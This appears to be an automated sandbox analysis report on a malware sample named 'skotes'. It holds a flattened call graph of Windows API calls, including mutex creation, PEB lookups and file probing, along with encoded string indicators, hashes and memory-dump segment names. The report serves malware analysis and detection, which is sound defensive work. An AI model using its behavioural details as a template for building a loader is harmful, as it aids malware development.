37452->37450 37453 6a47b0 37452->37453 37454 6a47eb 37453->37454 37457 6a4e70 ISource __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::_CancellationTokenState::_RegisterCallback 37453->37457 37455 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37454->37455 37454->37457 37456 6a480c 37455->37456 37458 695c10 4 API calls 37456->37458 37457->37452 37459 6a4813 37458->37459 37460 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37459->37460 37461 6a4825 37460->37461 37462 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37461->37462 37463 6a4837 37462->37463 37464 69be30 11 API calls 37463->37464 37465 6a4843 37464->37465 37466 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37465->37466 37467 6a4858 37466->37467 37468 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37467->37468 37469 6a4870 37468->37469 37470 695c10 4 API calls 37469->37470 37471 6a4877 37470->37471 37472 698580 RtlAllocateHeap 37471->37472 37473 6a4883 37472->37473 37474 6a4afd 37473->37474 37476 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37473->37476 37475 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37474->37475 37528 6a4f9c 37474->37528 37478 6a4b2f 37475->37478 37477 6a489f 37476->37477 37479 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37477->37479 37480 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37478->37480 37481 6a48b7 37479->37481 37482 6a4b44 37480->37482 37483 695c10 4 API calls 37481->37483 37484 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37482->37484 37485 6a48be 37483->37485 37486 6a4b56 37484->37486 37487 698580 RtlAllocateHeap 37485->37487 37488 69be30 11 API calls 37486->37488 37489 6a48ca 37487->37489 37490 6a4b62 37488->37490 37489->37474 37492 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37489->37492 37491 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37490->37491 37493 6a4b77 37491->37493 37494 6a48e7 37492->37494 37495 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37493->37495 37496 695c10 4 API calls 37494->37496 37497 6a4b8f 37495->37497 37501 6a48ef 37496->37501 37498 695c10 4 API calls 37497->37498 37499 6a4b96 37498->37499 37500 698580 RtlAllocateHeap 37499->37500 37502 6a4ba2 37500->37502 37503 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37501->37503 37502->37457 37504 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37502->37504 37512 6a4959 ISource 37503->37512 37505 6a4bbe 37504->37505 37506 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37505->37506 37507 6a4bd6 37506->37507 37508 695c10 4 API calls 37507->37508 37511 6a4bdd 37508->37511 37509 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37510 6a49e6 37509->37510 37513 695c10 4 API calls 37510->37513 37514 698580 RtlAllocateHeap 37511->37514 37512->37509 37517 6a49ee 37513->37517 37515 6a4be9 37514->37515 37515->37457 37516 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37515->37516 37518 6a4c06 37516->37518 37519 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37517->37519 37520 695c10 4 API calls 37518->37520 37521 6a4a49 ISource 37519->37521 37522 6a4c0e 37520->37522 37521->37474 37571 6998f0 37521->37571 37523 6a4c5a 37522->37523 37524 6a4f97 37522->37524 37527 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37523->37527 37526 6a8200 RtlAllocateHeap 37524->37526 37526->37528 37534 6a4c78 ISource 37527->37534 37576 6ac1d9 RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::ResourceManager::ResourceManager 37528->37576 37530 6a4ad5 __dosmaperr 37530->37474 37532 6c8ab6 3 API calls 37530->37532 37531 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37533 6a4d05 37531->37533 37532->37474 37535 695c10 4 API calls 37533->37535 37534->37457 37534->37531 37536 6a4d0d 37535->37536 37537 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37536->37537 37538 6a4d68 ISource 37537->37538 37538->37457 37539 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37538->37539 37540 6a4df7 37539->37540 37541 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37540->37541 37542 6a4e0c 37541->37542 37543 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37542->37543 37544 6a4e27 37543->37544 37545 695c10 4 API calls 37544->37545 37546 6a4e2e 37545->37546 37547 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37546->37547 37548 6a4e67 37547->37548 37550 6a4390 37548->37550 37551 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37550->37551 37552 6a43d2 37551->37552 37553 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37552->37553 37554 6a43e4 37553->37554 37555 698580 RtlAllocateHeap 37554->37555 37556 6a43ed 37555->37556 37557 6a4646 37556->37557 37560 6a43f8 ISource 37556->37560 37558 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37557->37558 37559 6a4657 37558->37559 37561 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37559->37561 37562 6a80c0 RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37560->37562 37565 6a4610 ISource __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 37560->37565 37566 6a9280 RtlAllocateHeap 37560->37566 37569 6a7a00 RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37560->37569 37577 6a3640 37560->37577 37563 6a466c 37561->37563 37562->37560 37564 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37563->37564 37567 6a467e 37564->37567 37565->37457 37566->37560 37568 6a3640 13 API calls 37567->37568 37568->37565 37569->37560 37572 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37571->37572 37573 69991e 37572->37573 37574 695c10 4 API calls 37573->37574 37575 699927 ISource __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::VirtualProcessor::ThrowVirtualProcessorEvent 37574->37575 37575->37530 37576->37457 37578 6a367f 37577->37578 37580 6a3e6f ISource __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::_CancellationTokenState::_RegisterCallback 37577->37580 37579 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37578->37579 37581 6a36b0 37579->37581 37580->37560 37582 6a4327 37581->37582 37584 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37581->37584 37583 6a8200 RtlAllocateHeap 37582->37583 37585 6a432c 37583->37585 37586 6a36ff 37584->37586 37587 6a8200 RtlAllocateHeap 37585->37587 37586->37582 37588 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37586->37588 37591 6a4331 Concurrency::details::_CancellationTokenState::_RegisterCallback 37587->37591 37589 6a3743 37588->37589 37589->37582 37590 6a3765 37589->37590 37592 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37590->37592 37593 6a8200 RtlAllocateHeap 37591->37593 37594 6a3785 37592->37594 37598 6a4340 Concurrency::details::_CancellationTokenState::_RegisterCallback 37593->37598 37595 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37594->37595 37596 6a3798 37595->37596 37597 695c10 4 API calls 37596->37597 37600 6a37a3 37597->37600 37691 6ac199 RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::ResourceManager::ResourceManager 37598->37691 37600->37585 37601 6a37ef 37600->37601 37602 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37601->37602 37606 6a3811 ISource 37602->37606 37604 6998f0 4 API calls 37605 6a3872 37604->37605 37607 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37605->37607 37612 6a3c79 ISource Concurrency::details::_CancellationTokenState::_RegisterCallback 37605->37612 37606->37591 37606->37604 37608 6a3889 37607->37608 37609 695c10 4 API calls 37608->37609 37610 6a3894 37609->37610 37611 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37610->37611 37613 6a38dc ISource 37611->37613 37612->37580 37692 6ac1d9 RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::ResourceManager::ResourceManager 37612->37692 37613->37591 37614 6a39bd 37613->37614 37663 6a3ab7 ISource __dosmaperr 37613->37663 37615 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37614->37615 37634 6a39da ISource 37615->37634 37616 6c8ab6 3 API calls 37617 6a3b7a 37616->37617 37617->37598 37618 6a3b89 37617->37618 37618->37612 37619 6a3c8d 37618->37619 37620 6a3ba2 37618->37620 37621 6a3f42 37618->37621 37622 6a3e74 37618->37622 37624 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37619->37624 37626 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37620->37626 37625 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37621->37625 37627 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37622->37627 37623 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37628 6a3a96 37623->37628 37631 6a3cb5 37624->37631 37632 6a3f56 37625->37632 37633 6a3bca 37626->37633 37629 6a3e9c 37627->37629 37630 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37628->37630 37635 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37629->37635 37636 6a3aa8 37630->37636 37637 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37631->37637 37638 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37632->37638 37639 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37633->37639 37634->37598 37634->37623 37640 6a3eba 37635->37640 37688 6949a0 RtlAllocateHeap ISource Concurrency::details::_CancellationTokenState::_RegisterCallback 37636->37688 37642 6a3cd3 37637->37642 37643 6a3f6e 37638->37643 37644 6a3be8 37639->37644 37645 695c10 4 API calls 37640->37645 37646 695c10 4 API calls 37642->37646 37647 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37643->37647 37648 695c10 4 API calls 37644->37648 37649 6a3ec1 37645->37649 37650 6a3cda 37646->37650 37651 6a3f86 37647->37651 37652 6a3bef 37648->37652 37654 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37649->37654 37655 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37650->37655 37656 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37651->37656 37653 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37652->37653 37657 6a3c07 37653->37657 37658 6a3ed9 37654->37658 37659 6a3cef 37655->37659 37660 6a3f98 37656->37660 37661 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37657->37661 37662 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37658->37662 37664 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37659->37664 37690 6a2f10 13 API calls 4 library calls 37660->37690 37666 6a3c1f 37661->37666 37667 6a3ef1 37662->37667 37663->37598 37663->37616 37668 6a3d07 37664->37668 37669 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37666->37669 37670 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37667->37670 37671 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37668->37671 37672 6a3c37 37669->37672 37673 6a3f09 37670->37673 37674 6a3d1f 37671->37674 37675 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37672->37675 37676 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37673->37676 37677 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37674->37677 37678 6a3c4f 37675->37678 37679 6a3f21 37676->37679 37680 6a3d37 37677->37680 37681 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37678->37681 37682 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37679->37682 37683 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37680->37683 37684 6a3c67 37681->37684 37682->37684 37685 6a3d49 37683->37685 37687 6a7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37684->37687 37689 6a1ec0 13 API calls 4 library calls 37685->37689 37687->37612 37688->37663 37689->37612 37690->37612 37692->37580 37717 699ba5 GetFileAttributesA 37718 699bb5 ISource 37717->37718 37719 699c80 ISource 37718->37719 37720 69a91c Concurrency::details::_CancellationTokenState::_RegisterCallback 37718->37720 37722 6a80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37719->37722 37721 69a960 Sleep CreateMutexA 37720->37721 37725 69a98e 37721->37725 37723 69a903 37722->37723 37724 69a9a7 37725->37724 37728 6c6629 GetPEB GetPEB IsInExceptionSpec 37725->37728 37727 69a9b0 37728->37727 37777 6c6dda 37778 6c6de8 37777->37778 37779 6c6df6 37777->37779 37780 6c6e4c 8 API calls 37778->37780 37781 6c698d __wsopen_s 2 API calls 37779->37781 37782 6c6df2 37780->37782 37783 6c6e10 37781->37783 37784 6c68ed __wsopen_s RtlAllocateHeap 37783->37784 37785 6c6e1d 37784->37785 37787 6c6e24 __freea 37785->37787 37788 6c6e4c 37785->37788 37789 6c6e77 Concurrency::details::VirtualProcessor::ThrowVirtualProcessorEvent 37788->37789 37796 6c6e5a __dosmaperr ___std_exception_copy 37788->37796 37790 6c6eb9 CreateFileW 37789->37790 37795 6c6e9d __dosmaperr ___std_exception_copy 37789->37795 37791 6c6edd 37790->37791 37792 6c6eeb 37790->37792 37799 6c6fb4 GetFileType 37791->37799 37811 6c6f2a GetPEB RtlAllocateHeap GetPEB __dosmaperr 37792->37811 37795->37787 37796->37787 37797 6c6ee6 Concurrency::details::VirtualProcessor::ThrowVirtualProcessorEvent 37797->37795 37798 6c6f1c CloseHandle 37797->37798 37798->37795 37800 6c6fef Concurrency::details::VirtualProcessor::ThrowVirtualProcessorEvent 37799->37800 37810 6c7085 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z __dosmaperr 37799->37810 37801 6c7028 GetFileInformationByHandle 37800->37801 37800->37810 37802 6c703e 37801->37802 37801->37810 37812 6c727c 37802->37812 37806 6c705b 37807 6c7124 SystemTimeToTzSpecificLocalTime 37806->37807 37808 6c706e 37807->37808 37809 6c7124 SystemTimeToTzSpecificLocalTime 37808->37809 37809->37810 37810->37797 37811->37797 37813 6c7292 _wcsrchr 37812->37813 37814 6c704a 37813->37814 37826 6cbc13 GetPEB GetPEB __dosmaperr ___std_exception_copy 37813->37826 37822 6c7124 37814->37822 37816 6c72d6 37816->37814 37827 6cbc13 GetPEB GetPEB __dosmaperr ___std_exception_copy 37816->37827 37818 6c72e7 37818->37814 37828 6cbc13 GetPEB GetPEB __dosmaperr ___std_exception_copy 37818->37828 37820 6c72f8 37820->37814 37829 6cbc13 GetPEB GetPEB __dosmaperr ___std_exception_copy 37820->37829 37823 6c713c 37822->37823 37824 6c715c SystemTimeToTzSpecificLocalTime 37823->37824 37825 6c7142 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 37823->37825 37824->37825 37825->37806 37826->37816 37827->37818 37828->37820 37829->37814 37842 6cac53 37847 6caa29 37842->37847 37844 6cac69 37845 6cac92 37844->37845 37855 6d1a9c 37844->37855 37848 6caa48 37847->37848 37853 6caa5b __dosmaperr ___std_exception_copy 37848->37853 37858 6d132b GetPEB GetPEB __dosmaperr ___std_exception_copy 37848->37858 37850 6cabe0 37850->37853 37859 6d132b GetPEB GetPEB __dosmaperr ___std_exception_copy 37850->37859 37852 6cabfe 37852->37853 37860 6d132b GetPEB GetPEB __dosmaperr ___std_exception_copy 37852->37860 37853->37844 37861 6d1461 37855->37861 37857 6d1ab7 37857->37845 37858->37850 37859->37852 37860->37853 37862 6d146d ___scrt_is_nonwritable_in_current_image 37861->37862 37864 6d1474 __dosmaperr ___std_exception_copy __wsopen_s 37862->37864 37865 6d1a2e 37862->37865 37864->37857 37866 6c698d __wsopen_s 2 API calls 37865->37866 37867 6d1a50 37866->37867 37868 6c68ed __wsopen_s RtlAllocateHeap 37867->37868 37869 6d1a5d 37868->37869 37871 6d1a64 __freea 37869->37871 37872 6d1abc 37869->37872 37871->37864 37873 6d1ad9 __wsopen_s 37872->37873 37876 6d1aee __dosmaperr __wsopen_s 37873->37876 37886 6d1775 CreateFileW 37873->37886 37875 6d1be2 GetFileType 37875->37876 37880 6d1c34 __wsopen_s 37875->37880 37876->37871 37877 6d1b65 37877->37875 37877->37876 37887 6d1775 CreateFileW 37877->37887 37879 6d1baa 37879->37875 37879->37876 37883 6d1ca1 37880->37883 37888 6d1984 GetPEB GetPEB RtlAllocateHeap __dosmaperr __wsopen_s 37880->37888 37883->37876 37889 6d1522 3 API calls 3 library calls 37883->37889 37884 6d1cd6 37884->37876 37890 6d1775 CreateFileW 37884->37890 37886->37877 37887->37879 37888->37883 37889->37884 37890->37876

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 0069E530 Relevance: 25.5, APIs: 2, Strings: 12, Instructions: 998COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 438 69e530-69e843 call 6a7a00 call 695c10 call 6a7a00 call 695c10 call 6a9280 call 6a8320 call 6a8220 call 6a8320 call 6a7a00 * 3 call 69be30 call 6a7a00 * 2 call 695c10 call 698580 476 69ea1a-69ea62 438->476 477 69e8ce-69e9ec 438->477 476->477 481 69ea8f-69ea96 call 6ad663 476->481 486 69ea99-69eab2 call 6acff1 477->486 487 69e9f2-69e9fe 477->487 481->486 487->481 489 69ea04-69ea12 487->489 489->476 491 69eab8-69ee79 call 6c6c6a * 2 call 6a7a00 call 695c10 call 6a83c0 call 6a8220 GetFileAttributesA call 6a7a00 call 695c10 call 6a83c0 call 6a8220 GetFileAttributesA 489->491 526 69f5bb-69f66c call 6a80c0 491->526 527 69f273-69f28b 491->527 526->527 531 69f699-69f6a0 call 6ad663 526->531 528 69f291-69f29d 527->528 529 69f6a3-69f6b6 527->529 528->531 532 69f2a3-69f2b1 528->532 531->529 532->526 535 69f6cb-69f962 call 6c6c6a call 6a7a00 call 695c10 call 6a7a00 * 4 call 69e530 call 6a80c0 call 6a7a00 call 6a80c0 * 2 532->535 570 69f98c-69f9a5 call 6acff1 535->570 571 69f964-69f970 535->571 572 69f982-69f989 call 6ad663 571->572 573 69f972-69f980 571->573 572->570 573->572 575 69f9ab-69fb15 call 6c6c6a call 6a7a00 call 695c10 call 6a7a00 * 4 call 69e530 573->575 600 69fb3f-69fb4e 575->600 601 69fb17-69fb23 575->601 602 69fb35-69fb3c call 6ad663 601->602 603 69fb25-69fb33 601->603 602->600 603->602 604 69fb4f-69fc6f call 6c6c6a call 6a7a00 call 699580 call 699230 call 6a8320 603->604 620 69fc70-69fc75 604->620 620->620 621 69fc77-6a0860 call 6a80c0 call 6a7a00 * 2 call 69c360 call 6c6729 call 6a7a00 call 695c10 call 6a7a00 * 4 call 69e530 620->621 656 6a088a-6a08a5 call 6acff1 621->656 657 6a0862-6a086e 621->657 659 6a0880-6a0887 call 6ad663 657->659 660 6a0870-6a087e 657->660 659->656 660->659 663 6a08ce-6a12e4 call 6c6c6a call 6a7a00 call 695c10 call 6a7a00 * 4 call 69e530 660->663 683 6a12e9-6a15f2 663->683
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: #$111$246122658369$9c9aa5$GnNoc2Hc$L1o$MGE+$MQ==$UA==$WDw=$WTs=$WTw=
                                                                                                                                                                                                                                          • API String ID: 0-3493852988
                                                                                                                                                                                                                                          • Opcode ID: 5de71fa141f2d22b4582a52e76c9cafb4f5cd1a07f51539a28650b610dc12836
                                                                                                                                                                                                                                          • Instruction ID: f2eb2d1ce58c40435d34ba365b95fb1218825b013e38acfb3ad99e49a9b3a070
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5de71fa141f2d22b4582a52e76c9cafb4f5cd1a07f51539a28650b610dc12836
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B82A270A04288DBEF14EF68C9497DE7BB6AB06304F50858CE805677C2D7759A88CFD6
                                                                                                                                                                                                                                          Function 006D2517 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 374timeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
